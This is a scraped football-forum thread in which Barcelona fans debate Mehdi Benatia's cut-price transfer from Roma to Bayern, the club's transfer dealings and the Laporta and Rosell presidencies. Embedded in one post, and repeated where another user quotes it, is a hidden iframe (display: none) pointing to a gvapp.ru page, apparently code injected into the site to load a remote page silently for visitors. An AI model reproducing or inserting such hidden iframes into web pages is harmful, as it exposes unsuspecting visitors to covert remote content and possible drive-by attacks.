Mehdi Benatia

L

linetty

Suarez coulda gone cheaper after his biting incident.
Vermaelen overpaid for
Ter Stegen pretty much all clubs could pay same amount for
Halilovic? hes not even in first team.
Neymar cheap? yea..
Cesc was not the best made transfer.

Only that Benatia is better in both those regards + other qualities that neither Mathieu or Vermaelen posses, and hes younger
I'm pretty sure you were one of the ones that claimed the biting incident will not affect his fee.

Vermaelem for 10M was not overpaid.

Neymar was reltively cheap if you look at this markets prices. Madrid was offering much more but he chose us.

F

Flavia

Laporta had a lot of shady dealing going on and our financial situation was so dire as we had a debt of 500 -600 million euros during all those years of few wrong doings, that would have dissolved Barca as an entity which would have led to some random oil sheikh to buy the shares and take over the club from the socios(worst case scenario). So please don't talk about trophies considering the sh*t that Laporta put us through due to "few wrongdoings".

I really, really doubt it'd come to that. Rosell managed to be worse anyway, with the neymar saga, then resigning because of it, and with Barça now being sued for it. Really great job from him.
<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

R

Ryu Hayabusa

Bayern knows their business and drives a hard bargain. Our board truly is no match in this regard

Dont agree with this at all.

I'm beginning to wonder whether you always talk about stuff you obviously know little about.

DonAK

President of FC Barcelona
Think people dont realize that Benatia is not only a great defender, he is also a great organisor, leader of the backline and someone the younger guns could look upto and learn from by playing with him.

Anyway , it seem like the mgmt didnt want him or consider him for god knows which reasons so let it be. We've got a great team for this season although this deal for only 30m euros do leave a bad taste, but whats done is done.

Not a fan of Bayern at all, but im happt for him that he is in an elite club now and can showcase his quality for everyone without being ridiculed just because some people want to justify not buying him.

KingMessi

SiempreBlaugrana
The board should sell MESSI and buy CRISTIANO to repent for their crimes against humanity.

You high bro?

tumblr_m4sx9lDcyL1rw7k3jo1_500.gif

JamDav1982

Roma have gambled knowing that a lot of big teams are looking for CBs. All their talk of 60m was to drive up the price in a market and create an auction. The most likely knew all along they would not have him by start of season.

One by one the bigger clubs sorted out their CB issues and even Bayern no longer seemed to be looking or as desperate for a CB in a crazy market.

The result being that Roma have come to the end of the summer with an unhappy player looking to move and no club still looking.... until Martinez injury put Bayern back in the market.

Roma now in no position to negotiate with an unhappy player coming to the end of the transfer window have sold on the cheap.

Thats my take on it!

BarcaOG

Banned
Didn't we grow stronger too?

Sure, absolutely. Relatively compared to other clubs? No. Look at Chelsea, Man City, and Bayern. And, despite Madrid's lackluster first game yesterday, their squad remains more complete than ours. It'll be a miracle if Vermaelen/Matheiu manage to remain injury-free. Don't count on it. And what then? Pique and Mascherano? The past three seasons of Champions League football indicate that they are not up to par.

Sid90

I really, really doubt it'd come to that. Rosell managed to be worse anyway, with the neymar saga, then resigning because of it, and with Barça now being sued for it. Really great job from him.
<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

I think you know that Sandro was the one who pulled Ronaldinho deal when he was vice president under Laporta. He used his brazilian connection to buy Ronaldinho as he did for :neymar:. Btw i am defending Sandro, they are both corrupt as hell but you are defending Laporta who if he had managed Barca for a few more years as president then i am 100 % sure that Messi would been sold to cover the debt amount as we were a sinking ship in terms of economics.

Luftstalag14

Culé de Celestial Empire
Why did none of them get him earlier in summer?

It is not a case of him not being on their 'short list' that was my point.

In his defense I think clubs were initially scared away by the his outrageously high price tag, 60m.

You are right though to say that Bayern landed him for half of that price because Roma was running out of time to offload him. Now I think about it, if we were in Bayern's position, ie. being the lone suitor out there, we probably would have gotten him for 30m too. :lol:

R

Ryu Hayabusa

I dont agree that Barca dont drive a hard bargain when buying a player, all the time they are getting players cheaper than other clubs would pay.

Alright, I interpreted your statement from the other side of the coin, I guess.

Hamzah

High Definition Member
mathieu isn't injury prone at all. also our squad is really good apart from the right back position. better than city or chelsea.

Home of Barca Fans